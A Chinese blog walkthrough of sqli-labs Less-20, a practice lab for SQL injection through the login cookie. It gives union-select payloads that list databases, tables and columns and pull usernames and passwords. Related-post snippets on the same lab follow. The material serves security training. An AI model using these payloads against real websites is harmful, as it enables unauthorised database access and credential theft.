sqli-labs-Less-20 cookie头注入(全套题目,持续更新)

最新推荐文章于 2023-08-02 09:21:58 发布
最新推荐文章于 2023-08-02 09:21:58 发布
阅读量462 收藏 1
点赞数 1
分类专栏: sql注入 文章标签: sql 安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46432288/article/details/109895682
版权

Less-20 cookie头注入

**Cookie:**有时也用其复数形式 Cookies。类型为“小型文本文件”,是某些网站为了辨别用户身份,进行Session跟踪而储存在用户本地终端上的数据(通常经过加密),由用户客户端计算机暂时或永久保存的信息。

先正常登陆:
在这里插入图片描述

返回了输入的name和password,并提示使用cookie注入

判断注入点,使用插件Cookie Editor修改cookie,因为第一次登陆成功,cookie的值会在数据库存放,所以我们第一次登陆成功,后面更改cookie的值进行注入就可以获取信息。
正常登陆:
在这里插入图片描述

修改cookie的值为admin’,出现报错,

更改为admin‘#,返回正常,说明cookie闭合方式为’’,
在这里插入图片描述

接下来判断回显字段:
在这里插入图片描述

我们在3位置处构造sql语句,进行注入:

查询当前数据库:

在这里插入图片描述
在这里插入图片描述

查询所有数据库:

’ union select 1,2,(select group_concat(schema_name) from information_schema.schemata)#
在这里插入图片描述

查询security库中的所有表:

’ union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’)#
在这里插入图片描述

查询users表中的字段:

’ union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’)#
在这里插入图片描述

将username和password联合查出:

’ union select 1,2,(select concat_ws(username,’/-’,password) from security.users limit 0,1)#
在这里插入图片描述

未完待续。。。。。

yzcn
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs第二十关(cookie注入)
qq_42266432的博客
08-29 1082
此关名为cookie注入,那就试下cookie注入吧 先使用admin登录,登录时会发出两个请求,全部抓住,第一个没cookie,正常forward,在第二个请求的cookie后加上单引号探路 可以看见页面回显sql报错,接下来思路就很清晰了 order by 猜出字段数为3 ...
sqli-labs Less-20(cookie注入
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-03 340
本篇文章使用的环境为sqli-labs Less-20 不懂为什么使用账户admin:admin登陆后页面没有正常返回cookie,所有我使用工具添加了一条cookie信息, 使用burp suite抓取流量包 1、修改cookie值,发现是使用单引号闭合的 此处可以看到页面存在报错信息,可以使用报错注入 2、判断字段数 通过使用order by 进行判断,发现存在3个字段 3、尝试使用联合查询(使用联合查询时,需要使前面的查询语句结果为假),判断当前页面是否有显示位 可以看到当前页面存在显示位置
SQL注入:sqli-labs 20 Cookie注入
Zeker62的博客
08-12 351
使用前面关卡知道的账号密码:Dumb和Dumb进入 再进入的同时抓个包,发送到repeater模块 发现这个包有cookie,依据题目题目明白这是个cookie注入: 加个单引号,报错; 报错信息我们知道这是个字符型注入,那剩下就简单多了 判断回显点 注意:Cookie语句中的注释是# ...
sqli-labs靶场第二十关
gou1791241251的博客
12-30 1157
根据提示,二十关是cookie注入。我们输入单引号和双引号进行测试 发现它报错了,说明应该是单引号闭合的 尝试一下构建报错注入。 此处的报错信息中查询到了数据库版本,同理可以查询所有库,所有表名,所有字段名等信息。 ...
sqli-labs第二十关详解
金 帛的博客
05-07 1921
sql靶场第二十关详解,DNSlog注入
sqli-labs靶场实现(八)【cookie注入+cookie base64编码注入】(less-20、less-22、具体步骤+图文详解)
weixin_46709219的博客
01-03 1005
一)cookie注入   1)cookie介绍   2)cookie注入代码分析   3)cookie注入利用   4)sqlmap安全检测 二)cookie base64编码注入   1)cookie介绍   2)cookie注入代码分析   3)cookie注入利用   4)sqlmap安全检测 —————————————————————————————————————————————————— 一)cookie注入 1)cookie介绍: 服务器可以利用cookie包含信息的任意性来筛选并经常性的
(手工)【sqli-labs20】cookie注入:原理、利用过程
07-10 932
【SQL-cookie注入
sqli-labs(九)_COOKIE注入
weixin_30877755的博客
08-29 227
第二十关: 这关是一个Cookie处的注入,输入正确的账号密码后,会跳到index.php页面,如下图 这个时候再访问登陆页面的时候http://localhost/sqli-labs-master/Less-20/还是上面的页面,因为登陆后将信息存在了Cookie中,后台进行判断,发现Cookie中有值时会显示上面的个人信息,而不是登录框。在上面哪些信息中可以看到,多出了一个Your I...
Sqllibs-Less20-22-cookie注入
Xor0ne
07-13 392
文章目录20.Less20-Cookie Injection-Error Based20.1、注入分析20.2、代码分析21、Cookie Injection-Error Based21.1、注入分析21.2、代码分析22.Less22-Cookie Injection-Error Based-Double Quotes22.1、注入分析22.2、代码分析 20.Less20-Cookie Injection-Error Based 20.1、注入分析 有源码我们可知,当我们第一次输入username和pa
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
安装sqli-labs
10-22
本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地Web靶场 在开始安装sqli...
【sqli-labs】 less22 Cookie Injection- Error Based- Double Quotes - string (基于错误的双引号字符型Cookie注入)...
ajxi63204的博客
01-26 90
注入的过程和less 20 21一样,这次闭合cookie的使用的双引号 转载于:https://www.cnblogs.com/omnis/p/8360957.html
sql注入之sqli-labs(less11-less20)
小宇的web博客
03-17 792
sql注入之sqli-labs(less11-less20)特详解 less11 1.输入用户名和密码admin和admin查看输出 2.利用burpsuite来进行抓包(这个抓包软件需要java环境自行配置和下载直接度娘,burp下载后还需要自行把火狐浏览器的代理服务器配置)。 3.打开burpsuite来进行抓包(uname=admin&passwd=admin&submit=Submit这个就是抓包的数据) 4.将这个数据复制后打开火狐浏览器,复制到指定的位置。(这时必须关闭bu
sqli-labs通关全解---有关请求注入--less18-22--7
cyynid的博客
01-12 396
Accept: application/json 浏览器可以接受服务器回发的类型为 application/json。Accept: */* 代表浏览器可以处理所有类型,(一般浏览器发给服务器都是发这个)。Accept-Encoding: gzip, deflate 浏览器申明自己接收的编码方法,通常指定压缩方法,是否支持压缩,支持什么压缩方法(gzip,deflate),(注意:这不是只字符编码)。q=0.9 浏览器申明自己接收的语言。
sqli-labs20关基于post的cookie报错注入
qq_46527080的博客
12-18 315
知识点 Cookie Cookie指某些网站为了辨别用户身份、进行session跟踪而储存在用户本地终端上的数据 Cookie,有时候也用复数形式Cookies,这种是指某些网站为了辨别用户身份,简单来说就是当您输入一次网站的用户名和密码之后,下一次就可以不需要输入。 服务器发送到用户浏览器并保存在本地的一小块数据,它会在浏览器下次向同一服务器再发起请求时被携带并发送到服务器上。通常,它用于告知网站服务器两个请求是否来自同一浏览器,如保持用户的登录状态。 $_COOKIE函数 作用:读取cookie信息
[网络安全]sqli-labs Less-20 解题详析
等风来
08-02 2372
以上为[网络安全]sqli-labs Less-20 解题详析,考察报错注入及mid函数的应用,后续将分享 [网络安全]sqli-labs Less-21 解题详析。我是秋说,我们下次见。
sqli-labs-master/Less-17
07-28
Less-17 是一个 SQL 注入实验,它位于 sqli-labs-master 实验室的目录中。在这个实验中,你可以学习和实践 SQL 注入攻击的技术。 SQL 注入是一种常见的网络安全漏洞,它允许攻击者通过在应用程序的输入字段中注入恶意的 SQL 代码来执行未经授权的操作。通过利用这个漏洞,攻击者可以绕过应用程序的认证机制、获取敏感数据或者修改数据库中的内容。 在 Less-17 中,你将面对一个存在 SQL 注入漏洞的应用程序。你需要通过注入恶意的 SQL 代码来绕过应用程序的认证机制,以获取管理员权限。 注意:SQL 注入是一种非法行为,只能在合法的环境下进行学习和实验。在现实世界中,从事任何形式的黑客攻击都是违法行为,请始终遵守法律和道德规范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值